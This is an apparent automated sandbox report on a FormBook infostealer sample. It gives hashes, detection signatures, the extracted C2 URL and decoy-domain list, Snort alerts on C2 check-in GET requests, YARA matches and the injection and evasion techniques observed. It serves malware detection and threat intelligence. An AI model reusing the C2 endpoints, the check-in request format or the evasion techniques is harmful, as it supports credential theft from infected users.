Analysis Report YNzE2QUkvaTK7kd.exe

Overview

General Information

Sample Name: YNzE2QUkvaTK7kd.exe
Analysis ID: 385317
MD5: 52322f04ee7e74ed0dee03b54dbb2b14
SHA1: 8689cd483e8cc3ff397004f993c567161c4d3c41
SHA256: ef885d515b4d6e1bcbd650edf17a089b6c7d5f36fcadfe65491cea49f0f53b91
Tags: Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.smarttel.management/msc/"], "decoy": ["vanwertfamilyhealth.com", "amiawke.com", "hq-leaks.net", "playersgolfworld.info", "atlantaoffshore.com", "redstateaf.com", "leosquad.world", "elchtec.com", "mjshenanigans.com", "rbsccj.com", "360healthy.life", "sympa.digital", "afrotresor.com", "amazingliberty.com", "realsults.com", "preethamgudichuttu.com", "anastasiavegilates.com", "blockchainfest.asia", "viaverdeproject.net", "shouryashukla.com", "african-elephant.com", "factorysale.online", "vqxxmrxhpsho.mobi", "munchstaging.com", "codealemayohabrha.com", "melrosecakecompany.com", "themaskamigo.com", "aviatop.online", "coivdanswers.com", "geralouittane.com", "amazonshack.com", "aeguana.info", "samaalkaleej.com", "disruptorgen.com", "crystalcpv.com", "lsertsex.com", "affiliatesupersummit.com", "tintuc-247.info", "balakawu.com", "smartecomall.com", "chorahouses.com", "bellezaorganica.club", "greenbayhemorrhoidcenter.com", "iklanlaskar.com", "oldtownbusinessdistrict.com", "hindmetalhouse.com", "diligentpom.com", "genetic-web.com", "novergi.com", "sincetimebegan.com", "foodyfie.com", "wfiboostrs.com", "startuphrs.com", "vkjuzcsh.icu", "primarewards.net", "snappygarden.com", "rangerpoint.net", "meramission.com", "adsatadvanstar.com", "railrockers.com", "smartlightinggreenidea.com", "streetsmartlove.net", "shnfxj.com", "sms-master.online"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: YNzE2QUkvaTK7kd.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: YNzE2QUkvaTK7kd.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: YNzE2QUkvaTK7kd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: YNzE2QUkvaTK7kd.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.701470628.00000000017C0000.00000040.00000001.sdmp, ipconfig.exe, 00000009.00000002.912250730.00000000033C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, ipconfig.exe
Source: Binary string: RegSvcs.pdb source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05238720
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05239480
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05239490
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05238712
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05238854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 6_2_00416CA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 6_2_00417D70
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 9_2_02E16CA2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 9_2_02E17D70

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 103.120.82.56:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 103.120.82.56:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 103.120.82.56:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.smarttel.management/msc/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pKH+jHoocxko HTTP/1.1Host: www.realsults.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=Vmyb2+dBHu0Fxfg/5qCzMPkyVQF1W5lD3/EJu1ZP6IBNOOXVlqQnUzqXVgG8rpdGNrLT HTTP/1.1Host: www.wfiboostrs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pKH+jHoocxko HTTP/1.1Host: www.realsults.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=Vmyb2+dBHu0Fxfg/5qCzMPkyVQF1W5lD3/EJu1ZP6IBNOOXVlqQnUzqXVgG8rpdGNrLT HTTP/1.1Host: www.wfiboostrs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.realsults.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Mon, 12 Apr 2021 08:14:17 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 7
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666101790.00000000031B1000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000002.666202347.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666202347.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: explorer.exe, 00000007.00000002.913212025.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648987814.000000000628D000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html(
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665267575.0000000006250000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.650917361.000000000628D000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665267575.0000000006250000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com4
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665267575.0000000006250000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comlvfet
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.646162179.000000000190C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com%
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.646162179.000000000190C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comp
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.646162179.000000000190C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comt
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.653148237.0000000006264000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000003.648827768.000000000625D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648644780.0000000006253000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp//r
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648727005.000000000625D000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-s
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648827768.000000000625D000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/n
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.649060879.000000000628D000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.comp
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.647753850.0000000006264000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comc
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419D5A NtCreateFile, 6_2_00419D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E0A NtReadFile, 6_2_00419E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419F3A NtAllocateVirtualMemory, 6_2_00419F3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018299A0 NtCreateSection,LdrInitializeThunk, 6_2_018299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_01829910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018298F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_018298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829840 NtDelayExecution,LdrInitializeThunk, 6_2_01829840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_01829860
